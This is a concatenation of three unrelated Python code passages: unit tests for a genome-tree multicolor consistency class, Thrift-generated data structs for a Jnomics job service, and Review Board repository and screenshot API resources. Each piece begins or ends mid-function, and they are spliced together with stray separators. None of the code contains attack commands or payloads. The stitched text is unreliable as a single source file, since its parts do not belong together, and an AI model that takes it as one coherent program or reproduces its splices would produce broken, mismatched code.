self.assertTrue(tree1.has_edge(node1_name=self.v1, node2_name=self.v3))
#####
self.assertTrue(tree2.multicolors_are_up_to_date)
self.assertEqual(len(list(tree2.nodes())), 3)
self.assertEqual(len(list(tree2.edges())), 2)
tree1.get_node_by_name("v5").name = "new_v5"
self.assertTrue(tree2.has_node("v5"))
def test_get_tree_consistent_multicolors(self):
# with no account for wgd root specification is irrelevant
tree = BGTree("(((v1, v2), v3),(v4, v5));")
self.assertFalse(tree.multicolors_are_up_to_date)
tree_consistent_multicolors = tree.get_tree_consistent_multicolors()
self.assertTrue(tree.multicolors_are_up_to_date)
self.assertIsInstance(tree_consistent_multicolors, list)
self.assertTrue(tree_consistent_multicolors, tree.tree_consistent_multicolors)
self.assertFalse(tree_consistent_multicolors is tree.tree_consistent_multicolors)
for obtained_mc, stored_mc in zip(tree_consistent_multicolors, tree.tree_consistent_multicolors):
self.assertFalse(obtained_mc is stored_mc)
self.assertSetEqual({mc.hashable_representation for mc in tree_consistent_multicolors},
tree.tree_consistent_multicolors_set)
self.assertEqual(len(tree_consistent_multicolors), 16)
ref_tree_consistent_multicolors = [
Multicolor(), Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v4, self.bg_v5),
Multicolor(self.bg_v1), Multicolor(self.bg_v2, self.bg_v3, self.bg_v4, self.bg_v5),
Multicolor(self.bg_v2), Multicolor(self.bg_v1, self.bg_v3, self.bg_v4, self.bg_v5),
Multicolor(self.bg_v3), Multicolor(self.bg_v1, self.bg_v2, self.bg_v4, self.bg_v5),
Multicolor(self.bg_v4), Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v5),
Multicolor(self.bg_v5), Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v4),
Multicolor(self.bg_v1, self.bg_v2), Multicolor(self.bg_v3, self.bg_v4, self.bg_v5),
Multicolor(self.bg_v4, self.bg_v5), Multicolor(self.bg_v1, self.bg_v2, self.bg_v3),
]
for multicolor in ref_tree_consistent_multicolors:
self.assertIn(multicolor, tree_consistent_multicolors)
def test_is_multicolor_tree_consistent(self):
# tests if supplied multicolor complies with tree topology
##########################################################################################
#
# empty multicolor complies with any tree
#
##########################################################################################
mc = Multicolor()
self.assertTrue(BGTree().multicolor_is_tree_consistent(mc))
##########################################################################################
#
# simple cases
#
##########################################################################################
tree = BGTree("(((v1, v2), v3),(v4, v5));")
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1)))
##########################################################################################
#
# a small v1, v2 subtree, still consistent
#
##########################################################################################
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v2)))
##########################################################################################
#
# bigger v1, v2, v3 subtree, still consistent
#
##########################################################################################
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v2, self.bg_v3)))
##########################################################################################
#
# v2, v3 is not a valid subtree (its compliment is two subtrees, instead of one)
#
##########################################################################################
self.assertFalse(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v2, self.bg_v3)))
##########################################################################################
#
# if some genomes in multicolor are not present in tree, then multicolor will not be consistent with the tree
#
##########################################################################################
self.assertFalse(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, BGGenome("v6"))))
##########################################################################################
#
# other cases for a non wgd tree
#
##########################################################################################
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v4)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v5)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v2, self.bg_v4, self.bg_v5)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v3, self.bg_v4, self.bg_v5)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v2, self.bg_v3, self.bg_v4, self.bg_v5)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v4, self.bg_v5)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v5, self.bg_v4)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v3, self.bg_v4, self.bg_v5)))
self.assertFalse(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v3, self.bg_v5)))
def test_is_multicolor_tree_consistent_non_binary_tree(self):
tree = BGTree("(v1, v2, v3);")
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v2)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v3)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v2, self.bg_v3)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v2)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v3)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v3, self.bg_v2)))
def test_is_bgedge_tree_consistent(self):
# tests if supplied bgedge has a multicolor that is consistent with tree topology
v1, v2 = "v1", "v2"
bgedge = BGEdge(vertex1=v1, vertex2=v2, multicolor=Multicolor())
##########################################################################################
#
# bgedge with an empty multicolor complies with any tree
#
##########################################################################################
mc = Multicolor()
bgedge.multicolor = mc
self.assertTrue(BGTree("(v1, v2);").bgedge_is_tree_consistent(bgedge))
##########################################################################################
#
# simple cases
#
##########################################################################################
tree = BGTree("(((v1, v2), v3),(v4, v5));")
bgedge.multicolor = Multicolor(self.bg_v1)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
##########################################################################################
#
# a small v1, v2 subtree, still consistent
#
##########################################################################################
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
##########################################################################################
#
# bigger v1, v2, v3 subtree, still consistent
#
##########################################################################################
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2, self.bg_v3)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
##########################################################################################
#
# v2, v3 is not a valid subtree (its compliment is two subtrees, instead of one)
#
##########################################################################################
bgedge.multicolor = Multicolor(self.bg_v2, self.bg_v3)
self.assertFalse(tree.bgedge_is_tree_consistent(bgedge))
##########################################################################################
#
# if some genomes in multicolor are not present in tree, then multicolor will not be consistent with the tree
#
##########################################################################################
bgedge.multicolor = Multicolor(self.bg_v1, BGGenome("v6"))
self.assertFalse(tree.bgedge_is_tree_consistent(bgedge))
##########################################################################################
#
# other cases for a non wgd tree
#
##########################################################################################
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v4)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v5)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2, self.bg_v4, self.bg_v5)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v3, self.bg_v4, self.bg_v5)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v2, self.bg_v3, self.bg_v4, self.bg_v5)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v4, self.bg_v5)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v5, self.bg_v4)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v3, self.bg_v4, self.bg_v5)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v3, self.bg_v5)
self.assertFalse(tree.bgedge_is_tree_consistent(bgedge))
def test_get_vtree_consistent_multicolors(self):
tree = BGTree("(((v1, v2), v3),(v4, v5));")
self.assertFalse(tree.multicolors_are_up_to_date)
vtree_consistent_multicolors = tree.get_vtree_consistent_multicolors()
self.assertTrue(tree.multicolors_are_up_to_date)
self.assertIsInstance(vtree_consistent_multicolors, list)
self.assertTrue(vtree_consistent_multicolors, tree.vtree_consistent_multicolors)
self.assertFalse(vtree_consistent_multicolors is tree.vtree_consistent_multicolors)
for obtained_mc, stored_mc in zip(vtree_consistent_multicolors, tree.vtree_consistent_multicolors):
self.assertFalse(obtained_mc is stored_mc)
self.assertSetEqual({mc.hashable_representation for mc in vtree_consistent_multicolors},
tree.vtree_consistent_multicolors_set)
self.assertEqual(len(vtree_consistent_multicolors), 10)
ref_vtree_consistent_multicolors = [
Multicolor(), Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v4, self.bg_v5),
Multicolor(self.bg_v1),
Multicolor(self.bg_v2),
Multicolor(self.bg_v3),
Multicolor(self.bg_v4),
Multicolor(self.bg_v5),
Multicolor(self.bg_v1, self.bg_v2),
Multicolor(self.bg_v4, self.bg_v5), Multicolor(self.bg_v1, self.bg_v2, self.bg_v3),
]
for multicolor in ref_vtree_consistent_multicolors:
self.assertIn(multicolor, vtree_consistent_multicolors)
def test_is_multicolor_vtree_consistent(self):
mc = Multicolor()
self.assertTrue(BGTree().multicolor_is_vtree_consistent(mc))
tree = BGTree("(((v1, v2), v3), (v4, v5));")
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v2)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v4, self.bg_v5)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v2, self.bg_v3)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v4, self.bg_v5)))
self.assertFalse(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v2, self.bg_v3)))
self.assertFalse(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, BGGenome("v6"))))
self.assertFalse(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v3, self.bg_v5)))
def test_is_multicolor_vtree_consistent_non_binary_tree(self):
tree = BGTree("(v1, v2, v3);")
self.assertTrue(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v1)))
self.assertTrue(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v2)))
self.assertTrue(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v3)))
self.assertTrue(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v1, self.bg_v2, self.bg_v3)))
self.assertFalse(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v1, self.bg_v2)))
self.assertFalse(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v1, self.bg_v3)))
self.assertFalse(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v3, self.bg_v2)))
def test_is_bgedge_vtree_consistent(self):
v1, v2 = "v1", "v2"
bgedge = BGEdge(vertex1=v1, vertex2=v2, multicolor=Multicolor())
##########################################################################################
#
# bgedge with an empty multicolor complies with any tree
#
##########################################################################################
mc = Multicolor()
bgedge.multicolor = mc
self.assertTrue(BGTree("(v1, v2);").bgedge_is_vtree_consistent(bgedge))
##########################################################################################
#
# simple cases
#
##########################################################################################
tree = BGTree("(((v1, v2), v3),(v4, v5));")
bgedge.multicolor = Multicolor(self.bg_v1)
self.assertTrue(tree.bgedge_is_vtree_consistent(bgedge))
##########################################################################################
#
# a small v1, v2 subtree, still consistent
#
##########################################################################################
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2)
self.assertTrue(tree.bgedge_is_vtree_consistent(bgedge))
##########################################################################################
#
# bigger v1, v2, v3 subtree, still consistent
#
##########################################################################################
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2, self.bg_v3)
self.assertTrue(tree.bgedge_is_vtree_consistent(bgedge))
##########################################################################################
#
# v2, v3 is not a valid subtree (its compliment is two subtrees, instead of one)
#
##########################################################################################
bgedge.multicolor = Multicolor(self.bg_v2, self.bg_v3)
self.assertFalse(tree.bgedge_is_vtree_consistent(bgedge))
##########################################################################################
#
# if some genomes in multicolor are not present in tree, then multicolor will not be consistent with the tree
#
##########################################################################################
bgedge.multicolor = Multicolor(self.bg_v1, BGGenome("v6"))
self.assertFalse(tree.bgedge_is_vtree_consistent(bgedge))
##########################################################################################
#
# other cases for a non wgd tree
#
##########################################################################################
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v4)
self.assertFalse(tree.bgedge_is_vtree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v5)
self.assertFalse(tree.bgedge_is_vtree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2, self.bg_v4, self.bg_v5)
self.assertFalse(tree.bgedge_is_vtree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v3, self.bg_v4, self.bg_v5)
self.assertFalse(tree.bgedge_is_vtree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v2, self.bg_v3, self.bg_v4, self.bg_v5)
self.assertFalse(tree.bgedge_is_vtree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v4, self.bg_v5)
self.assertTrue(tree.bgedge_is_vtree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v5, self.bg_v4)
self.assertTrue(tree.bgedge_is_vtree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v3, self.bg_v4, self.bg_v5)
self.assertFalse(tree.bgedge_is_vtree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v3, self.bg_v5)
self.assertFalse(tree.bgedge_is_vtree_consistent(bgedge))
def test_get_tree_consistent_multicolors_with_non_default_leaf_wrapper(self):
tree = BGTree("(v1, v2)root;", leaf_wrapper=lambda name: name)
tree_consistent_multicolors = tree.get_tree_consistent_multicolors()
ref_multicolors = [Multicolor(self.v1), Multicolor(self.v2), Multicolor(), Multicolor(self.v1, self.v2)]
self.assertEqual(len(tree_consistent_multicolors), 4)
for | |
<reponame>teharrison/narrative
#
# Autogenerated by Thrift Compiler (0.9.1)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Authentication:
"""
Attributes:
- username
- password
- token
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'username', None, None, ), # 1
(2, TType.STRING, 'password', None, None, ), # 2
(3, TType.STRING, 'token', None, None, ), # 3
)
def __init__(self, username=None, password=<PASSWORD>, token=None,):
self.username = username
self.password = password
self.token = token
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.username = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.password = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.token = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Authentication')
if self.username is not None:
oprot.writeFieldBegin('username', TType.STRING, 1)
oprot.writeString(self.username)
oprot.writeFieldEnd()
if self.password is not None:
oprot.writeFieldBegin('password', TType.STRING, 2)
oprot.writeString(self.password)
oprot.writeFieldEnd()
if self.token is not None:
oprot.writeFieldBegin('token', TType.STRING, 3)
oprot.writeString(self.token)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class JnomicsThriftJobID:
"""
Attributes:
- job_id
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'job_id', None, None, ), # 1
)
def __init__(self, job_id=None,):
self.job_id = job_id
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.job_id = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('JnomicsThriftJobID')
if self.job_id is not None:
oprot.writeFieldBegin('job_id', TType.STRING, 1)
oprot.writeString(self.job_id)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class JnomicsThriftHandle:
"""
Attributes:
- uuid
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'uuid', None, None, ), # 1
)
def __init__(self, uuid=None,):
self.uuid = uuid
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.uuid = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('JnomicsThriftHandle')
if self.uuid is not None:
oprot.writeFieldBegin('uuid', TType.STRING, 1)
oprot.writeString(self.uuid)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class JnomicsThriftFileStatus:
"""
Attributes:
- isDir
- path
- owner
- group
- permission
- replication
- mod_time
- block_size
- length
"""
thrift_spec = (
None, # 0
(1, TType.BOOL, 'isDir', None, None, ), # 1
(2, TType.STRING, 'path', None, None, ), # 2
(3, TType.STRING, 'owner', None, None, ), # 3
(4, TType.STRING, 'group', None, None, ), # 4
(5, TType.STRING, 'permission', None, None, ), # 5
(6, TType.I16, 'replication', None, None, ), # 6
(7, TType.I64, 'mod_time', None, None, ), # 7
(8, TType.I64, 'block_size', None, None, ), # 8
(9, TType.I64, 'length', None, None, ), # 9
)
def __init__(self, isDir=None, path=None, owner=None, group=None, permission=None, replication=None, mod_time=None, block_size=None, length=None,):
self.isDir = isDir
self.path = path
self.owner = owner
self.group = group
self.permission = permission
self.replication = replication
self.mod_time = mod_time
self.block_size = block_size
self.length = length
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.BOOL:
self.isDir = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.path = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.owner = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.group = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.permission = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I16:
self.replication = iprot.readI16();
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.I64:
self.mod_time = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.I64:
self.block_size = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.I64:
self.length = iprot.readI64();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('JnomicsThriftFileStatus')
if self.isDir is not None:
oprot.writeFieldBegin('isDir', TType.BOOL, 1)
oprot.writeBool(self.isDir)
oprot.writeFieldEnd()
if self.path is not None:
oprot.writeFieldBegin('path', TType.STRING, 2)
oprot.writeString(self.path)
oprot.writeFieldEnd()
if self.owner is not None:
oprot.writeFieldBegin('owner', TType.STRING, 3)
oprot.writeString(self.owner)
oprot.writeFieldEnd()
if self.group is not None:
oprot.writeFieldBegin('group', TType.STRING, 4)
oprot.writeString(self.group)
oprot.writeFieldEnd()
if self.permission is not None:
oprot.writeFieldBegin('permission', TType.STRING, 5)
oprot.writeString(self.permission)
oprot.writeFieldEnd()
if self.replication is not None:
oprot.writeFieldBegin('replication', TType.I16, 6)
oprot.writeI16(self.replication)
oprot.writeFieldEnd()
if self.mod_time is not None:
oprot.writeFieldBegin('mod_time', TType.I64, 7)
oprot.writeI64(self.mod_time)
oprot.writeFieldEnd()
if self.block_size is not None:
oprot.writeFieldBegin('block_size', TType.I64, 8)
oprot.writeI64(self.block_size)
oprot.writeFieldEnd()
if self.length is not None:
oprot.writeFieldBegin('length', TType.I64, 9)
oprot.writeI64(self.length)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class JnomicsThriftJobStatus:
"""
Attributes:
- job_id
- username
- failure_info
- complete
- running_state
- start_time
- priority
- mapProgress
- reduceProgress
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'job_id', None, None, ), # 1
(2, TType.STRING, 'username', None, None, ), # 2
(3, TType.STRING, 'failure_info', None, None, ), # 3
(4, TType.BOOL, 'complete', None, None, ), # 4
(5, TType.I32, 'running_state', None, None, ), # 5
(6, TType.I64, 'start_time', None, None, ), # 6
(7, TType.STRING, 'priority', None, None, ), # 7
(8, TType.DOUBLE, 'mapProgress', None, None, ), # 8
(9, TType.DOUBLE, 'reduceProgress', None, None, ), # 9
)
def __init__(self, job_id=None, username=None, failure_info=None, complete=None, running_state=None, start_time=None, priority=None, mapProgress=None, reduceProgress=None,):
self.job_id = job_id
self.username = username
self.failure_info = failure_info
self.complete = complete
self.running_state = running_state
self.start_time = start_time
self.priority = priority
self.mapProgress = mapProgress
self.reduceProgress = reduceProgress
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.job_id = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.username = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.failure_info = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.BOOL:
self.complete = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I32:
self.running_state = iprot.readI32();
else:
iprot.skip(ftype)
elif | |
be used just before issuing a DELETE call, which will
# set the visibility flag to False
if kwargs.get('archive_name', False):
# This should be sufficiently unlikely to create duplicates. time()
# will use up a max of 8 characters, so we slice the name down to
# make the result fit in 64 characters
repository.name = 'ar:%s:%x' % (repository.name[:50], int(time()))
repository.save()
return 200, {
self.item_result_key: repository,
}
@webapi_check_local_site
@webapi_login_required
@webapi_response_errors(DOES_NOT_EXIST, NOT_LOGGED_IN, PERMISSION_DENIED)
def delete(self, request, *args, **kwargs):
"""Deletes a repository.
The repository will not actually be deleted from the database, as
that would also trigger a deletion of all review requests. Instead,
it makes a repository as no longer being visible, which will hide it
in the UIs and in the API.
"""
try:
repository = self.get_object(request, *args, **kwargs)
except ObjectDoesNotExist:
return DOES_NOT_EXIST
if not self.has_delete_permissions(request, repository):
return _no_access_error(request.user)
# We don't actually delete the repository. We instead just hide it.
# Otherwise, all the review requests are lost. By marking it as not
# visible, it'll be removed from the UI and from the list in the API.
repository.visible = False
repository.save()
return 204, {}
def _check_repository(self, scmtool_class, path, username, password,
local_site, trust_host):
if local_site:
local_site_name = local_site.name
else:
local_site_name = None
while 1:
# Keep doing this until we have an error we don't want
# to ignore, or it's successful.
try:
scmtool_class.check_repository(path, username, password,
local_site_name)
return None
except RepositoryNotFoundError:
return MISSING_REPOSITORY
except BadHostKeyError, e:
if trust_host:
try:
sshutils.replace_host_key(e.hostname,
e.raw_expected_key,
e.raw_key,
local_site_name)
except IOError, e:
return SERVER_CONFIG_ERROR, {
'reason': str(e),
}
else:
return BAD_HOST_KEY, {
'hostname': e.hostname,
'expected_key': e.raw_expected_key.get_base64(),
'key': e.raw_key.get_base64(),
}
except UnknownHostKeyError, e:
if trust_host:
try:
sshutils.add_host_key(e.hostname, e.raw_key,
local_site_name)
except IOError, e:
return SERVER_CONFIG_ERROR, {
'reason': str(e),
}
else:
return UNVERIFIED_HOST_KEY, {
'hostname': e.hostname,
'key': e.raw_key.get_base64(),
}
except UnverifiedCertificateError, e:
if trust_host:
try:
scmtool_class.accept_certificate(path, local_site_name)
except IOError, e:
return SERVER_CONFIG_ERROR, {
'reason': str(e),
}
else:
return UNVERIFIED_HOST_CERT, {
'certificate': {
'failures': e.certificate.failures,
'fingerprint': e.certificate.fingerprint,
'hostname': e.certificate.hostname,
'issuer': e.certificate.issuer,
'valid': {
'from': e.certificate.valid_from,
'until': e.certificate.valid_until,
},
},
}
except AuthenticationError, e:
if 'publickey' in e.allowed_types and e.user_key is None:
return MISSING_USER_KEY
else:
return REPO_AUTHENTICATION_ERROR, {
'reason': str(e),
}
except Exception, e:
logging.error('Unknown error in checking repository %s: %s',
path, e, exc_info=1)
# We should give something better, but I don't have anything.
# This will at least give a HTTP 500.
raise
repository_resource = RepositoryResource()
class BaseScreenshotResource(WebAPIResource):
"""A base resource representing screenshots."""
model = Screenshot
name = 'screenshot'
fields = {
'id': {
'type': int,
'description': 'The numeric ID of the screenshot.',
},
'caption': {
'type': str,
'description': "The screenshot's descriptive caption.",
},
'path': {
'type': str,
'description': "The path of the screenshot's image file, "
"relative to the media directory configured "
"on the Review Board server.",
},
'url': {
'type': str,
'description': "The URL of the screenshot file. If this is not "
"an absolute URL (for example, if it is just a "
"path), then it's relative to the Review Board "
"server's URL.",
},
'thumbnail_url': {
'type': str,
'description': "The URL of the screenshot's thumbnail file. "
"If this is not an absolute URL (for example, "
"if it is just a path), then it's relative to "
"the Review Board server's URL.",
},
}
uri_object_key = 'screenshot_id'
autogenerate_etags = True
def get_queryset(self, request, review_request_id, is_list=False,
*args, **kwargs):
review_request = review_request_resource.get_object(
request, review_request_id, *args, **kwargs)
q = Q(review_request=review_request)
if not is_list:
q = q | Q(inactive_review_request=review_request)
if request.user == review_request.submitter:
try:
draft = review_request_draft_resource.get_object(
request, review_request_id, *args, **kwargs)
q = q | Q(drafts=draft)
if not is_list:
q = q | Q(inactive_drafts=draft)
except ObjectDoesNotExist:
pass
return self.model.objects.filter(q)
def serialize_path_field(self, obj):
